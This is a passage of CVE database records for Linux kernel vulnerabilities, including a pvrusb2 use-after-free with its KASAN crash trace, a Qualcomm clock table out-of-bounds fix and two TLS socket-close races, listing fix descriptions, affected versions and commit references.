          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: pvrusb2: fix uaf in pvr2_context_set_notify\n\n[Syzbot reported]\nBUG: KASAN: slab-use-after-free in pvr2_context_set_notify+0x2c4/0x310 drivers/media/usb/pvrusb2/pvrusb2-context.c:35\nRead of size 4 at addr ffff888113aeb0d8 by task kworker/1:1/26\n\nCPU: 1 PID: 26 Comm: kworker/1:1 Not tainted 6.8.0-rc1-syzkaller-00046-gf1a27f081c1f #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/25/2024\nWorkqueue: usb_hub_wq hub_event\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xd9/0x1b0 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:377 [inline]\n print_report+0xc4/0x620 mm/kasan/report.c:488\n kasan_report+0xda/0x110 mm/kasan/report.c:601\n pvr2_context_set_notify+0x2c4/0x310 drivers/media/usb/pvrusb2/pvrusb2-context.c:35\n pvr2_context_notify drivers/media/usb/pvrusb2/pvrusb2-context.c:95 [inline]\n pvr2_context_disconnect+0x94/0xb0 drivers/media/usb/pvrusb2/pvrusb2-context.c:272\n\nFreed by task 906:\nkasan_save_stack+0x33/0x50 mm/kasan/common.c:47\nkasan_save_track+0x14/0x30 mm/kasan/common.c:68\nkasan_save_free_info+0x3f/0x60 mm/kasan/generic.c:640\npoison_slab_object mm/kasan/common.c:241 [inline]\n__kasan_slab_free+0x106/0x1b0 mm/kasan/common.c:257\nkasan_slab_free include/linux/kasan.h:184 [inline]\nslab_free_hook mm/slub.c:2121 [inline]\nslab_free mm/slub.c:4299 [inline]\nkfree+0x105/0x340 mm/slub.c:4409\npvr2_context_check drivers/media/usb/pvrusb2/pvrusb2-context.c:137 [inline]\npvr2_context_thread_func+0x69d/0x960 drivers/media/usb/pvrusb2/pvrusb2-context.c:158\n\n[Analyze]\nTask A set disconnect_flag = !0, which resulted in Task B\u0027s condition being met\nand releasing mp, leading to this issue.\n\n[Fix]\nPlace the disconnect_flag assignment operation after all code in pvr2_context_disconnect()\nto avoid this issue."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:58:37.032Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ed8000e1e8e9684ab6c30cf2b526c0cea039929c"
        },
        {
          "url": "https://git.kernel.org/stable/c/d29ed08964cec8b9729bc55c7bb23f679d7a18fb"
        },
        {
          "url": "https://git.kernel.org/stable/c/ab896d93fd6a2cd1afeb034c3cc9226cb499209f"
        },
        {
          "url": "https://git.kernel.org/stable/c/eb6e9dce979c08210ff7249e5e0eceb8991bfcd7"
        },
        {
          "url": "https://git.kernel.org/stable/c/3a1ec89708d2e57e2712f46241282961b1a7a475"
        },
        {
          "url": "https://git.kernel.org/stable/c/8e60b99f6b7ccb3badeb512f5eb613ad45904592"
        },
        {
          "url": "https://git.kernel.org/stable/c/40cd818fae875c424a8335009db33c7b5a07de3a"
        },
        {
          "url": "https://git.kernel.org/stable/c/eaa410e05bdf562c90b23cdf2d9327f9c4625e16"
        },
        {
          "url": "https://git.kernel.org/stable/c/0a0b79ea55de8514e1750884e5fec77f9fdd01ee"
        }
      ],
      "title": "media: pvrusb2: fix uaf in pvr2_context_set_notify",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26875",
    "datePublished": "2024-04-17T10:27:33.914Z",
    "dateReserved": "2024-02-19T14:20:24.185Z",
    "dateUpdated": "2025-05-04T08:58:37.032Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26965 (GCVE-0-2024-26965)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:19 – Updated: 2025-05-04 09:00

Title

clk: qcom: mmcc-msm8974: fix terminating of frequency table arrays

Summary

In the Linux kernel, the following vulnerability has been resolved: clk: qcom: mmcc-msm8974: fix terminating of frequency table arrays The frequency table arrays are supposed to be terminated with an empty element. Add such entry to the end of the arrays where it is missing in order to avoid possible out-of-bound access when the table is traversed by functions like qcom_find_freq() or qcom_find_freq_floor(). Only compile tested.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/99740c4791dc8019b…
	https://git.kernel.org/stable/c/86bf75d9158f511db…
	https://git.kernel.org/stable/c/3ff4a0f6a8f0ad4b4…
	https://git.kernel.org/stable/c/8f562f3b25177c205…
	https://git.kernel.org/stable/c/537040c257ab4cd06…
	https://git.kernel.org/stable/c/7e9926fef71e514b4…
	https://git.kernel.org/stable/c/ae99e199037c580b7…
	https://git.kernel.org/stable/c/ca2cf98d46748373e…
	https://git.kernel.org/stable/c/e2c02a85bf53ae86d…

Impacted products

Vendor

Product

Version

Linux

Affected: d8b212014e69d6b6323773ce6898f224ef4ed0d6 , < 99740c4791dc8019b0d758c5389ca6d1c0604d95 (git)
Affected: d8b212014e69d6b6323773ce6898f224ef4ed0d6 , < 86bf75d9158f511db7530bc82a84b19a5134d089 (git)
Affected: d8b212014e69d6b6323773ce6898f224ef4ed0d6 , < 3ff4a0f6a8f0ad4b4ee9e908bdfc3cacb7be4060 (git)
Affected: d8b212014e69d6b6323773ce6898f224ef4ed0d6 , < 8f562f3b25177c2055b20fd8cf000496f6fa9194 (git)
Affected: d8b212014e69d6b6323773ce6898f224ef4ed0d6 , < 537040c257ab4cd0673fbae048f3940c8ea2e589 (git)
Affected: d8b212014e69d6b6323773ce6898f224ef4ed0d6 , < 7e9926fef71e514b4a8ea9d11d5a84d52b181362 (git)
Affected: d8b212014e69d6b6323773ce6898f224ef4ed0d6 , < ae99e199037c580b7350bfa3596f447a53bcf01f (git)
Affected: d8b212014e69d6b6323773ce6898f224ef4ed0d6 , < ca2cf98d46748373e830a13d85d215d64a2d9bf2 (git)
Affected: d8b212014e69d6b6323773ce6898f224ef4ed0d6 , < e2c02a85bf53ae86d79b5fccf0a75ac0b78e0c96 (git)

Linux

Affected: 3.14
Unaffected: 0 , < 3.14 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26965",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T17:50:48.637005Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:49:04.278Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.666Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/99740c4791dc8019b0d758c5389ca6d1c0604d95"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/86bf75d9158f511db7530bc82a84b19a5134d089"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3ff4a0f6a8f0ad4b4ee9e908bdfc3cacb7be4060"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8f562f3b25177c2055b20fd8cf000496f6fa9194"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/537040c257ab4cd0673fbae048f3940c8ea2e589"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7e9926fef71e514b4a8ea9d11d5a84d52b181362"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ae99e199037c580b7350bfa3596f447a53bcf01f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ca2cf98d46748373e830a13d85d215d64a2d9bf2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e2c02a85bf53ae86d79b5fccf0a75ac0b78e0c96"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/clk/qcom/mmcc-msm8974.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "99740c4791dc8019b0d758c5389ca6d1c0604d95",
              "status": "affected",
              "version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
              "versionType": "git"
            },
            {
              "lessThan": "86bf75d9158f511db7530bc82a84b19a5134d089",
              "status": "affected",
              "version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
              "versionType": "git"
            },
            {
              "lessThan": "3ff4a0f6a8f0ad4b4ee9e908bdfc3cacb7be4060",
              "status": "affected",
              "version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
              "versionType": "git"
            },
            {
              "lessThan": "8f562f3b25177c2055b20fd8cf000496f6fa9194",
              "status": "affected",
              "version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
              "versionType": "git"
            },
            {
              "lessThan": "537040c257ab4cd0673fbae048f3940c8ea2e589",
              "status": "affected",
              "version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
              "versionType": "git"
            },
            {
              "lessThan": "7e9926fef71e514b4a8ea9d11d5a84d52b181362",
              "status": "affected",
              "version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
              "versionType": "git"
            },
            {
              "lessThan": "ae99e199037c580b7350bfa3596f447a53bcf01f",
              "status": "affected",
              "version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
              "versionType": "git"
            },
            {
              "lessThan": "ca2cf98d46748373e830a13d85d215d64a2d9bf2",
              "status": "affected",
              "version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
              "versionType": "git"
            },
            {
              "lessThan": "e2c02a85bf53ae86d79b5fccf0a75ac0b78e0c96",
              "status": "affected",
              "version": "d8b212014e69d6b6323773ce6898f224ef4ed0d6",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/clk/qcom/mmcc-msm8974.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.14"
            },
            {
              "lessThan": "3.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: qcom: mmcc-msm8974: fix terminating of frequency table arrays\n\nThe frequency table arrays are supposed to be terminated with an\nempty element. Add such entry to the end of the arrays where it\nis missing in order to avoid possible out-of-bound access when\nthe table is traversed by functions like qcom_find_freq() or\nqcom_find_freq_floor().\n\nOnly compile tested."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:00:58.832Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/99740c4791dc8019b0d758c5389ca6d1c0604d95"
        },
        {
          "url": "https://git.kernel.org/stable/c/86bf75d9158f511db7530bc82a84b19a5134d089"
        },
        {
          "url": "https://git.kernel.org/stable/c/3ff4a0f6a8f0ad4b4ee9e908bdfc3cacb7be4060"
        },
        {
          "url": "https://git.kernel.org/stable/c/8f562f3b25177c2055b20fd8cf000496f6fa9194"
        },
        {
          "url": "https://git.kernel.org/stable/c/537040c257ab4cd0673fbae048f3940c8ea2e589"
        },
        {
          "url": "https://git.kernel.org/stable/c/7e9926fef71e514b4a8ea9d11d5a84d52b181362"
        },
        {
          "url": "https://git.kernel.org/stable/c/ae99e199037c580b7350bfa3596f447a53bcf01f"
        },
        {
          "url": "https://git.kernel.org/stable/c/ca2cf98d46748373e830a13d85d215d64a2d9bf2"
        },
        {
          "url": "https://git.kernel.org/stable/c/e2c02a85bf53ae86d79b5fccf0a75ac0b78e0c96"
        }
      ],
      "title": "clk: qcom: mmcc-msm8974: fix terminating of frequency table arrays",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26965",
    "datePublished": "2024-05-01T05:19:32.635Z",
    "dateReserved": "2024-02-19T14:20:24.201Z",
    "dateUpdated": "2025-05-04T09:00:58.832Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26583 (GCVE-0-2024-26583)

Vulnerability from cvelistv5 – Published: 2024-02-21 14:59 – Updated: 2025-11-04 18:29

Title

tls: fix race between async notify and socket close

Summary

In the Linux kernel, the following vulnerability has been resolved: tls: fix race between async notify and socket close The submitting thread (one which called recvmsg/sendmsg) may exit as soon as the async crypto handler calls complete() so any code past that point risks touching already freed data. Try to avoid the locking and extra flags altogether. Have the main thread hold an extra reference, this way we can depend solely on the atomic ref counter for synchronization. Don't futz with reiniting the completion, either, we are now tightly controlling when completion fires.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f17d21ea73918ace8…
	https://git.kernel.org/stable/c/7a3ca06d04d589dee…
	https://git.kernel.org/stable/c/86dc27ee36f558fe2…
	https://git.kernel.org/stable/c/6209319b2efdd8524…
	https://git.kernel.org/stable/c/aec7961916f3f9e88…

Impacted products

Vendor

Product

Version

Linux

Affected: 0cada33241d9de205522e3858b18e506ca5cce2c , < f17d21ea73918ace8afb9c2d8e734dbf71c2c9d7 (git)
Affected: 0cada33241d9de205522e3858b18e506ca5cce2c , < 7a3ca06d04d589deec81f56229a9a9d62352ce01 (git)
Affected: 0cada33241d9de205522e3858b18e506ca5cce2c , < 86dc27ee36f558fe223dbdfbfcb6856247356f4a (git)
Affected: 0cada33241d9de205522e3858b18e506ca5cce2c , < 6209319b2efdd8524691187ee99c40637558fa33 (git)
Affected: 0cada33241d9de205522e3858b18e506ca5cce2c , < aec7961916f3f9e88766e2688992da6980f11b8d (git)
Affected: cf4cc95a15f599560c7abd89095a7973a4b9cec3 (git)
Affected: 9b81d43da15e56ed89f083f326561acdcaf549ce (git)

Linux

Affected: 5.7
Unaffected: 0 , < 5.7 (semver)
Unaffected: 5.15.160 , ≤ 5.15.* (semver)
Unaffected: 6.1.79 , ≤ 6.1.* (semver)
Unaffected: 6.6.18 , ≤ 6.6.* (semver)
Unaffected: 6.7.6 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26583",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-02-22T16:41:40.480459Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-05T17:21:01.043Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T18:29:46.349Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f17d21ea73918ace8afb9c2d8e734dbf71c2c9d7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7a3ca06d04d589deec81f56229a9a9d62352ce01"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/86dc27ee36f558fe223dbdfbfcb6856247356f4a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6209319b2efdd8524691187ee99c40637558fa33"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/aec7961916f3f9e88766e2688992da6980f11b8d"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "include/net/tls.h",
            "net/tls/tls_sw.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f17d21ea73918ace8afb9c2d8e734dbf71c2c9d7",
              "status": "affected",
              "version": "0cada33241d9de205522e3858b18e506ca5cce2c",
              "versionType": "git"
            },
            {
              "lessThan": "7a3ca06d04d589deec81f56229a9a9d62352ce01",
              "status": "affected",
              "version": "0cada33241d9de205522e3858b18e506ca5cce2c",
              "versionType": "git"
            },
            {
              "lessThan": "86dc27ee36f558fe223dbdfbfcb6856247356f4a",
              "status": "affected",
              "version": "0cada33241d9de205522e3858b18e506ca5cce2c",
              "versionType": "git"
            },
            {
              "lessThan": "6209319b2efdd8524691187ee99c40637558fa33",
              "status": "affected",
              "version": "0cada33241d9de205522e3858b18e506ca5cce2c",
              "versionType": "git"
            },
            {
              "lessThan": "aec7961916f3f9e88766e2688992da6980f11b8d",
              "status": "affected",
              "version": "0cada33241d9de205522e3858b18e506ca5cce2c",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "cf4cc95a15f599560c7abd89095a7973a4b9cec3",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "9b81d43da15e56ed89f083f326561acdcaf549ce",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "include/net/tls.h",
            "net/tls/tls_sw.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.7"
            },
            {
              "lessThan": "5.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.160",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.79",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.18",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.160",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.79",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.18",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.6",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.4.44",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.6.16",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntls: fix race between async notify and socket close\n\nThe submitting thread (one which called recvmsg/sendmsg)\nmay exit as soon as the async crypto handler calls complete()\nso any code past that point risks touching already freed data.\n\nTry to avoid the locking and extra flags altogether.\nHave the main thread hold an extra reference, this way\nwe can depend solely on the atomic ref counter for\nsynchronization.\n\nDon\u0027t futz with reiniting the completion, either, we are now\ntightly controlling when completion fires."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:54:14.010Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f17d21ea73918ace8afb9c2d8e734dbf71c2c9d7"
        },
        {
          "url": "https://git.kernel.org/stable/c/7a3ca06d04d589deec81f56229a9a9d62352ce01"
        },
        {
          "url": "https://git.kernel.org/stable/c/86dc27ee36f558fe223dbdfbfcb6856247356f4a"
        },
        {
          "url": "https://git.kernel.org/stable/c/6209319b2efdd8524691187ee99c40637558fa33"
        },
        {
          "url": "https://git.kernel.org/stable/c/aec7961916f3f9e88766e2688992da6980f11b8d"
        }
      ],
      "title": "tls: fix race between async notify and socket close",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26583",
    "datePublished": "2024-02-21T14:59:11.845Z",
    "dateReserved": "2024-02-19T14:20:24.125Z",
    "dateUpdated": "2025-11-04T18:29:46.349Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26585 (GCVE-0-2024-26585)

Vulnerability from cvelistv5 – Published: 2024-02-21 14:59 – Updated: 2025-11-04 18:29

Title

tls: fix race between tx work scheduling and socket close

Summary

In the Linux kernel, the following vulnerability has been resolved: tls: fix race between tx work scheduling and socket close Similarly to previous commit, the submitting thread (recvmsg/sendmsg) may exit as soon as the async crypto handler calls complete(). Reorder scheduling the work before calling complete(). This seems more logical in the first place, as it's the inverse order of what the submitting thread will do.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/dd32621f19243f89c…
	https://git.kernel.org/stable/c/196f198ca6fce04ba…
	https://git.kernel.org/stable/c/6db22d6c7a6dc914b…
	https://git.kernel.org/stable/c/e327ed60bff4a991c…
	https://git.kernel.org/stable/c/e01e3934a1b2d1229…

Impacted products

Vendor

Product

Version

Linux

Affected: a42055e8d2c30d4decfc13ce943d09c7b9dad221 , < dd32621f19243f89ce830919496a5dcc2158aa33 (git)
Affected: a42055e8d2c30d4decfc13ce943d09c7b9dad221 , < 196f198ca6fce04ba6ce262f5a0e4d567d7d219d (git)
Affected: a42055e8d2c30d4decfc13ce943d09c7b9dad221 , < 6db22d6c7a6dc914b12c0469b94eb639b6a8a146 (git)
Affected: a42055e8d2c30d4decfc13ce943d09c7b9dad221 , < e327ed60bff4a991cd7a709c47c4f0c5b4a4fd57 (git)
Affected: a42055e8d2c30d4decfc13ce943d09c7b9dad221 , < e01e3934a1b2d122919f73bc6ddbe1cdafc4bbdb (git)

Linux

Affected: 4.20
Unaffected: 0 , < 4.20 (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.18 , ≤ 6.6.* (semver)
Unaffected: 6.7.6 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26585",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-28T17:07:29.305466Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-28T17:07:36.266Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T18:29:48.732Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/196f198ca6fce04ba6ce262f5a0e4d567d7d219d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6db22d6c7a6dc914b12c0469b94eb639b6a8a146"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e327ed60bff4a991cd7a709c47c4f0c5b4a4fd57"
          },
          {
            "tags": [
              "x_transferred"
            ],
